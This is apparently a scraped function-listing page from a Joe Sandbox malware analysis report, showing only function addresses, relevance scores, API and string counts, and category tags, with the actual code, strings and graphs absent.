Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
Control-flow Graph
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404F72 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07921798 Relevance: 14.6, Strings: 11, Instructions: 825COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE4900 Relevance: 2.8, Strings: 2, Instructions: 275COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE2F68 Relevance: .5, Instructions: 472COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07921A54 Relevance: .1, Instructions: 116COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE33E0 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE33F0 Relevance: .1, Instructions: 102COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE48D0 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE2AA0 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 04DE2A90 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0316D01D Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0316D006 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 079208A0 Relevance: 9.1, Strings: 7, Instructions: 320COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07923D70 Relevance: 7.9, Strings: 6, Instructions: 436COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 079214E8 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07923518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 07920570 Relevance: 5.1, Strings: 4, Instructions: 55COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|